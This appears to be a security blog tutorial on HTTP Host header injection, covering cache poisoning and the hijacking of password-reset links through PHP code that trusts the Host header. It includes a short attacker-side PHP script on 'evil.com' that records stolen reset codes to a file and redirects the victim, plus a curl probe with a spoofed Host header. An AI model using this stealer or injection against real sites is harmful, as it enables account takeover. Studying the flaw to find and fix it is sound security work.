HTTP Host Header Injections

0
393
Host Header Injections

This post explains HTTP host header poisoning , and the consequences of exploit like cache poisoning and stealing password-reset tokens .

Hello again ,
This time we are going to explain in details an old limited vulnerability , Injecting host header.
Since you can not force a browser to issue an HTTP request that has injected host header , so this vulnerability can not exploited directly against users , Internet explorer only the vulnerable browser that can issue an injected host header when it get redirected this was discovered by sergey bobrov and microsoft did not fix it quickly , this bug is fixed on windows Ten , Windows 7 still vulnerable.

The impact of injecting host header
– Cache poisoning
– Password-Reset links hijacking.

First let’s explain the cache poisoning.
What is cache? let’s assume that you browsed a newspaper or magazine and this website allows you to choose multiple options to customize your feeds , so you will choose your country ,area favorite aspect .. etc , then the web application takes your input , searches the back-end and displays the result to you , this process might take some time , so they invented caching to give you the last result instead of repeating the previous process.
Now what if you can alter this result , this means that may another user request the same resource and so the Cache server responds with your malicious result , this can lead to other consequences like defacement or phishing and so.

Second hijacking password reset links or codes.

When you forget your facebook , and you request a new one facebook will email you with a link contains a 6 digits code as the following

[code language=”php”]
https://facebook.com/reset?id=your_id&code=random
[/code]

This what happens on front-end . What about the back end.

First facebook generates random code , then construct a url , and sends it to you.

[code language=”php”]
$code=Get_random_code(6);
$host=Get_Host();
$id=Get_user_id();
$email=Get_user_email();
$link="http://".$host."/rest/?pid=".$id."&code=".$code;
mail($email,$link);
[/code]

Look at the code , some functions does not exist , only on my mind , the code is not the matter , but our main point here is how the web application gets the host before constructing the link . let’s talk about another website , facebook is not vulnerable to this issue , let’s suppose mysocial.com is vulnerable to host header injection so he takes your host and print it .

In php , some developers trust user host , they think it can not be edited so :

[code language=”php”]
$host=$_SERVER[HTTP_HOST];
[/code]

This value is controlled by an attacker.
Now the web application thinks that the user forgot his password , and they should send them a link to reset it the code will be as :

[code language=”php”]
$code=rand(9,20);
$host=$_SERVER[HTTP_HOST];
$email=Get_user_email();
$link="http://".$host."/account/reset.php?code=".$code;
mail($email,$link);
[/code]

Did you noticed

[code language=”php”]$host=$_SERVER[HTTP_HOST];[/code]

in PHP this value is set by end user , [SERVER_NAME is not] , so now what if an attacker set this value to evil.com , the final link that will be sent to the real user becomes as :

[code language=”php”]
http://evil.com/account/rest.php?code=789a7fjafajf9af789sf
[/code]

This link now will be sent to the real user.
Then the attacker which owns evil.net will create a new directory on his website named as account , inside this directory he will create a new file named reset.php this file will contains the follwoing code

[code language=”php”]

$codevalue=$_GET[‘code’];
file_put_contents(‘stolen.txt’,$codevalue);
header(‘Location: http://targetwebsite.com/notfoundpage’);

[/code]

What is ? it is a real phishing attack performed with help from the web application itself ,The real user will check his inbox and find the malicious link and press on it , the code will be sent to the attacker website and it will be stored thanks to reset.php file , the attacker now takes the real code or hash and reset the password for the victim user , assuming that the victim will think the link is broken after clicking and it is not a phishing.

Now we explained what is Host Injections.
How to detect it , it is like normal xss , you have to inject something and see if it is reflected or not .
Using your curl on your unix machine , this command is fair enough to detect host injection.

[code language=”php”]
Curl -H ‘Host: evil.com’ http://targetwebsite.com/ -i
[/code]

For windows users you can use burp repeater but you need to write the request , or use our pretty tool Host injector it has some auto-generated payloads to bypass some filters .

Host header injector tool
Host header injection

SEE YOU

LEAVE A REPLY

Please enter your comment!
Please enter your name here